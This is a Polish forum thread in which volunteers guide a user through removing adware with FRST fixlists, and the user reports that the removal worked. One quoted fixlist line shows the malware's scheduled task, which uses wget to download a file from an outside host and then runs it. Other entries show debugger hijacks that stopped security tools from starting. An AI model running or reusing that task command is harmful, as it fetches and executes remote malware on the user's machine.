Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

DNS unlocker, nie działa regedit, ccleaner - logi z FRST

maciejnasz 03 Wrz 2015 14:36 597 8
  • #1 03 Wrz 2015 14:36
    maciejnasz
    Poziom 4  

    Kolejny problem z DNS unlocker (reklamy w przeglądarkach), oprócz tego nie mogę uruchmić CCleanera, regedit. FRST dopiero po zmianie nazwy aplikacji udało się włączyć. Proszę o pomoc.

    0 8
  • Pomocny post
    #2 03 Wrz 2015 14:45
    Domino_2
    Pomocny dla użytkowników

    Odinstaluj SearchMe Toolbar v10.0.

    Cytat:

    Task: {F836BBE6-674D-462F-9784-E1659DD63775} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" &amp; ping 1.1.1.1 -n 300 -w 1000 &amp; wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=sHEk7zC2XV;ALLPlayer_Premium_5.6.2_Setup.exe;1439140144 &amp; start cmd /R dat.bmp <==== ATTENTION
    HKLM-x32\...\Run: [] => [X]
    HKLM-x32\...\Run: [mbot_pl_160] => [X]
    HKU\S-1-5-21-205291459-3032830507-925190500-1000\...\Run: [AdobeBridge] => [X]
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File
    GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
    Toolbar: HKU\S-1-5-21-205291459-3032830507-925190500-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
    StartMenuInternet: IEXPLORE.EXE - iexplore.exe
    FF Plugin: @microsoft.com/GENUINE -> disabled No File
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
    FF Plugin HKU\S-1-5-21-205291459-3032830507-925190500-1000: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll No File
    OPR Extension: (Roll Around) - C:\Users\Oto\AppData\Roaming\Opera Software\Opera Stable\Extensions\hephlipnhkfgdgamhnkjenhcbnnfgeoe [2015-05-24]
    S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
    S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
    S3 TrustedInstaller; %SystemRoot%\servicing\TrustedInstaller.exe [X]
    U3 afu7cgu4; C:\Windows\System32\Drivers\afu7cgu4.sys [0 ] (Intel Corporation) <==== ATTENTION (zero size file/folder)
    S3 VGPU; System32\drivers\rdvgkmd.sys [X]
    2015-08-28 09:49 - 2015-08-28 14:28 - 00000000 ____D () C:\AdwCleaner
    C:\ProgramData\sysid100.dat
    C:\ProgramData\wget.exe
    EmptyTemp:


    Wklej to do notatnika i zapisz pod nazwą fixlist.txt i umieść w folderze gdzie znajduje się plik FRST.exe, odpal go i kliknij Fix/Napraw.

    1
  • #3 03 Wrz 2015 15:48
    maciejnasz
    Poziom 4  

    Dziękuję, pomogło. Pozdrawiam.

    0
  • #4 03 Wrz 2015 17:56
    Acorus 20
    Spec od komputerów

    To nie wszystko.Pokaż nowe logi z FRST.

    0
  • Pomocny post
    #6 03 Wrz 2015 19:34
    Kolobos
    Spec od komputerów

    Odinstaluj: SearchMe Toolbar v10.0

    Uzyj AdwCleaner, opcja Scan i Clean/Szukaj i Usun: https://toolslib.net/downloads/viewdownload/1-adwcleaner/

    Nowy Fixlist.txt dla FRST:
    Task: {E2BF5C67-1990-49C9-A346-BFA3CFD2471A} - System32\Tasks\ModifyCommands => c:\programdata\{42de512b-8690-8b2e-42de-e512b86944ae}\file.exe <==== UWAGA
    Task: C:\Windows\Tasks\ModifyCommands.job => c:\programdata\{42de512b-8690-8b2e-42de-e512b86944ae}\file.exe <==== UWAGA
    IFEO\adwcleaner_4.204.exe: [Debugger] svchost.exe
    IFEO\AnVir.exe: [Debugger] svchost.exe
    IFEO\AutoLogger.exe: [Debugger] svchost.exe
    IFEO\avz.exe: [Debugger] svchost.exe
    IFEO\CCleaner.exe: [Debugger] svchost.exe
    IFEO\CCleaner64.exe: [Debugger] svchost.exe
    IFEO\FRST.exe: [Debugger] svchost.exe
    IFEO\FRST64.exe: [Debugger] svchost.exe
    IFEO\HiJackThis.exe: [Debugger] svchost.exe
    IFEO\regedit.exe: [Debugger] svchost.exe
    IFEO\RegWorks.exe: [Debugger] svchost.exe
    IFEO\RSIT.exe: [Debugger] svchost.exe
    IFEO\RSITx64.exe: [Debugger] svchost.exe
    BHO: RepliApPP -> {27FAD0C4-0AD2-464E-B430-C20673388725} -> C:\Program Files (x86)\RepliApPP\G8LpWPt3dZkbgd.x64.dll [2015-08-18] ()
    BHO: MyPriiceCCut -> {2DF5EAB9-3560-4A5D-8703-496BEB848A41} -> C:\Program Files (x86)\MyPriiceCCut\OUFAbrXlhdEJSq.x64.dll [2015-07-28] ()
    BHO: MOnsOnRevEnue -> {78D047B3-716D-4DFE-A7A2-63BA006B36B5} -> C:\Program Files (x86)\MOnsOnRevEnue\OQkiEFNZj0IpbL.x64.dll [2015-07-28] ()
    BHO: MyPrrICeCut -> {8A1E0D0A-47F5-4B15-BEC8-526D7E313345} -> C:\Program Files (x86)\MyPrrICeCut\O7pGWk81OBn1Iz.x64.dll [2015-07-28] ()
    BHO: RepliAppp -> {DD996D93-1F84-49F1-91A1-1773F6986AEC} -> C:\Program Files (x86)\RepliAppp\ZpqLhtwgevsh8o.x64.dll [2015-08-18] ()
    BHO-x32: RepliApPP -> {27FAD0C4-0AD2-464E-B430-C20673388725} -> C:\Program Files (x86)\RepliApPP\G8LpWPt3dZkbgd.dll [2015-08-18] ()
    BHO-x32: MyPriiceCCut -> {2DF5EAB9-3560-4A5D-8703-496BEB848A41} -> C:\Program Files (x86)\MyPriiceCCut\OUFAbrXlhdEJSq.dll [2015-07-28] ()
    BHO-x32: MOnsOnRevEnue -> {78D047B3-716D-4DFE-A7A2-63BA006B36B5} -> C:\Program Files (x86)\MOnsOnRevEnue\OQkiEFNZj0IpbL.dll [2015-07-28] ()
    BHO-x32: MyPrrICeCut -> {8A1E0D0A-47F5-4B15-BEC8-526D7E313345} -> C:\Program Files (x86)\MyPrrICeCut\O7pGWk81OBn1Iz.dll [2015-07-28] ()
    BHO-x32: RepliAppp -> {DD996D93-1F84-49F1-91A1-1773F6986AEC} -> C:\Program Files (x86)\RepliAppp\ZpqLhtwgevsh8o.dll [2015-08-18] ()
    FF SelectedSearchEngine: webssearches
    FF SearchPlugin: C:\Users\Oto\AppData\Roaming\Mozilla\Firefox\Profiles\6xoqf6vk.default-1415285690179\searchplugins\yahoo-avast.xml [2014-11-06]
    U3 an10w0ac; C:\Windows\System32\Drivers\an10w0ac.sys [0 ] (Advanced Micro Devices) <==== UWAGA (zerobajtowy plik/folder)
    2015-08-18 08:50 - 2015-08-18 08:50 - 00000000 ____D C:\Program Files (x86)\UrlChecker
    2015-08-18 08:50 - 2015-08-18 08:50 - 00000000 ____D C:\Program Files (x86)\ReipuluiAppp
    2015-08-18 08:49 - 2015-08-18 08:50 - 00000000 ____D C:\Program Files (x86)\RepliAppp
    2015-09-03 15:03 - 2015-07-28 09:03 - 00000318 _____ C:\Windows\Tasks\ModifyCommands.job
    EmptyTemp:

    1
  • Pomocny post
    #7 03 Wrz 2015 19:38
    Acorus 20
    Spec od komputerów

    Odinstaluj SearchMe Toolbar v10.0. Otwórz notatnik systemowy i wklej:

    Cytat:
    Task: {19036B05-2CBE-4EEA-9EAF-38BBD0808AB9} - System32\Tasks\{DF866C3E-4B49-475B-82A2-67523AD309AF} => pcalua.exe -a C:\Users\Oto\AppData\Roaming\mystartsearch\UninstallManager.exe -c -ptid=amt
    Task: {E2BF5C67-1990-49C9-A346-BFA3CFD2471A} - System32\Tasks\ModifyCommands => c:\programdata\{42de512b-8690-8b2e-42de-e512b86944ae}\file.exe <==== UWAGA
    Task: C:\Windows\Tasks\ModifyCommands.job => c:\programdata\{42de512b-8690-8b2e-42de-e512b86944ae}\file.exe <==== UWAGA
    IFEO\adwcleaner_4.204.exe: [Debugger] svchost.exe
    IFEO\AnVir.exe: [Debugger] svchost.exe
    IFEO\AutoLogger.exe: [Debugger] svchost.exe
    IFEO\avz.exe: [Debugger] svchost.exe
    IFEO\CCleaner.exe: [Debugger] svchost.exe
    IFEO\CCleaner64.exe: [Debugger] svchost.exe
    IFEO\FRST.exe: [Debugger] svchost.exe
    IFEO\FRST64.exe: [Debugger] svchost.exe
    IFEO\HiJackThis.exe: [Debugger] svchost.exe
    IFEO\regedit.exe: [Debugger] svchost.exe
    IFEO\RegWorks.exe: [Debugger] svchost.exe
    IFEO\RSIT.exe: [Debugger] svchost.exe
    IFEO\RSITx64.exe: [Debugger] svchost.exe
    BHO: RepliApPP -> {27FAD0C4-0AD2-464E-B430-C20673388725} -> C:\Program Files (x86)\RepliApPP\G8LpWPt3dZkbgd.x64.dll [2015-08-18] ()
    BHO: MyPriiceCCut -> {2DF5EAB9-3560-4A5D-8703-496BEB848A41} -> C:\Program Files (x86)\MyPriiceCCut\OUFAbrXlhdEJSq.x64.dll [2015-07-28] ()
    BHO: MOnsOnRevEnue -> {78D047B3-716D-4DFE-A7A2-63BA006B36B5} -> C:\Program Files (x86)\MOnsOnRevEnue\OQkiEFNZj0IpbL.x64.dll [2015-07-28] ()
    BHO: MyPrrICeCut -> {8A1E0D0A-47F5-4B15-BEC8-526D7E313345} -> C:\Program Files (x86)\MyPrrICeCut\O7pGWk81OBn1Iz.x64.dll [2015-07-28] ()
    BHO: RepliAppp -> {DD996D93-1F84-49F1-91A1-1773F6986AEC} -> C:\Program Files (x86)\RepliAppp\ZpqLhtwgevsh8o.x64.dll [2015-08-18] ()
    BHO-x32: RepliApPP -> {27FAD0C4-0AD2-464E-B430-C20673388725} -> C:\Program Files (x86)\RepliApPP\G8LpWPt3dZkbgd.dll [2015-08-18] ()
    BHO-x32: MyPriiceCCut -> {2DF5EAB9-3560-4A5D-8703-496BEB848A41} -> C:\Program Files (x86)\MyPriiceCCut\OUFAbrXlhdEJSq.dll [2015-07-28] ()
    BHO-x32: MOnsOnRevEnue -> {78D047B3-716D-4DFE-A7A2-63BA006B36B5} -> C:\Program Files (x86)\MOnsOnRevEnue\OQkiEFNZj0IpbL.dll [2015-07-28] ()
    BHO-x32: MyPrrICeCut -> {8A1E0D0A-47F5-4B15-BEC8-526D7E313345} -> C:\Program Files (x86)\MyPrrICeCut\O7pGWk81OBn1Iz.dll [2015-07-28] ()
    BHO-x32: RepliAppp -> {DD996D93-1F84-49F1-91A1-1773F6986AEC} -> C:\Program Files (x86)\RepliAppp\ZpqLhtwgevsh8o.dll [2015-08-18] ()
    FF SelectedSearchEngine: webssearches
    U3 an10w0ac; C:\Windows\System32\Drivers\an10w0ac.sys [0 ] (Advanced Micro Devices) <==== UWAGA (zerobajtowy plik/folder)
    2015-09-03 14:14 - 2015-09-03 14:14 - 00002892 _____ C:\Windows\System32\Tasks\{503BB9D3-3990-4806-A5B0-2A9DB00DDAC0}
    2015-09-03 14:14 - 2015-09-03 14:14 - 00002892 _____ C:\Windows\System32\Tasks\{04F1DF3C-81E8-4603-B6D9-4DBDA1DFAF0C}
    2015-08-18 08:50 - 2015-08-18 08:50 - 00000000 ____D C:\Program Files (x86)\UrlChecker
    2015-08-18 08:50 - 2015-08-18 08:50 - 00000000 ____D C:\Program Files (x86)\ReipuluiAppp
    2015-08-18 08:49 - 2015-08-18 08:50 - 00000000 ____D C:\Program Files (x86)\RepliAppp


    Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze.
    Uruchom jako administrator FRST i kliknij w Fix/Napraw.

    1
  • #8 03 Wrz 2015 20:15
    maciejnasz
    Poziom 4  

    Udało się uruchomić regedit i po DNS ani śladu. Wielkie dzięki!

    0
  • #9 03 Wrz 2015 20:31
    Acorus 20
    Spec od komputerów

    Skasuj folder C:\FRST.

    0